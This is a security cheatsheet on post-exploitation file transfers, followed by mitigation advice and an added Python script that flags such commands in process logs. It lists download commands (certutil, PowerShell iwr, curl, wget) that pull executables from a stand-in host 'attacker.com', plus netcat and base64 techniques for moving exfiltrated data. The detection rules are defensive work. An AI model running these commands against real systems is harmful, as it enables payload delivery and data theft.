File Transfers
File Transfers cheatsheet — File transfer techniques for post-exploitation.
Overview
File transfers are a critical post-exploitation skill that enables moving tools, payloads, and exfiltrated data between compromised systems and attacker-controlled infrastructure.
Proficiency in multiple file transfer techniques ensures operational flexibility when dealing with restrictive egress filtering or limited tool availability on target systems.
Key Commands & Payloads
The following commands are commonly used to transfer files during post-exploitation:
- python3 -m http.server 80
- python2 -m SimpleHTTPServer 80
- php -S 0.0.0.0:80
- ruby -run -ehttpd . -p 80
- nc -lvnp 4444 < file.txt (sender)
- nc target 4444 > file.txt (receiver)
- certutil -urlcache -f http://attacker.com/file.exe file.exe
- powershell -c Invoke-WebRequest -Uri http://attacker.com/file.exe -OutFile file.exe
- iwr -Uri http://attacker.com/file.exe -OutFile file.exe
- curl -O http://attacker.com/file.exe
- wget http://attacker.com/file.exe
- base64 < file (encode on target)
- echo <base64> | base64 -d > file (decode on attacker)
Tools & Techniques
Recommended tools for File Transfers:
- Python HTTP server: quick file hosting
- PHP built-in server: PHP-based file hosting
- Netcat: raw file transfer over TCP
- PowerShell Invoke-WebRequest (iwr): Windows download
- Certutil: Windows utility for file download
- Curl/Wget: Linux file download
- Base64 encoding: transfer binary files via text channels
- SMB: copy file from network share
Prevention & Mitigation
Security recommendations to prevent unauthorized file transfers:
- Implement strict egress filtering on outbound ports
- Use network proxies with content inspection
- Monitor large outbound data transfers
- Implement DLP (Data Loss Prevention) solutions
- Restrict PowerShell execution policy and command-line tools
- Enable Windows Defender/AV real-time scanning
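To support the monitoring recommendations above, the following added example (not part of the original cheatsheet) flags a subset of the listed transfer commands in process command-line logs. The rule names, hostnames and sample events are constructed for illustration; real input would come from a source such as process-creation auditing.

```python
import re

# Detection rules for transfer commands listed on this page.
# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("certutil-download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b", re.I)),
    ("powershell-download",
     re.compile(r"\b(?:invoke-webrequest|iwr)\b.*-outfile\b", re.I)),
    ("adhoc-http-server",
     re.compile(r"\bpython[23]?(?:\.exe)?\b.*-m\s+"
                r"(?:http\.server|SimpleHTTPServer)\b", re.I)),
    ("netcat-listener",
     re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-[a-z]*l[a-z]*\b", re.I)),
    ("base64-decode",
     re.compile(r"\bbase64\b.*\s(?:-d|--decode)\b", re.I)),
]

# Constructed sample events: (hostname, process command line).
EVENTS = [
    ("ws01", "certutil -urlcache -f http://files.example.test/tool.exe tool.exe"),
    ("ws01", "certutil -verify server.cer"),          # benign certutil use
    ("ws02", "powershell -c Invoke-WebRequest -Uri "
             "http://files.example.test/a.exe -OutFile a.exe"),
    ("srv01", "python3 -m http.server 80"),
    ("srv01", "nc -lvnp 4444"),
    ("srv02", "rsync -a /data backup:/data"),         # benign, must not match
    ("srv02", "sh -c echo QUJD | base64 -d > out.bin"),
]


def scan(events):
    """Return (host, rule_name, command_line) for every rule an event matches."""
    hits = []
    for host, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((host, name, cmdline))
    return hits


if __name__ == "__main__":
    for host, name, cmdline in scan(EVENTS):
        print(f"{host}\t{name}\t{cmdline}")
```

Matches are triage leads rather than verdicts: administrators also use these tools, so tune the rules against a baseline of normal activity per host role.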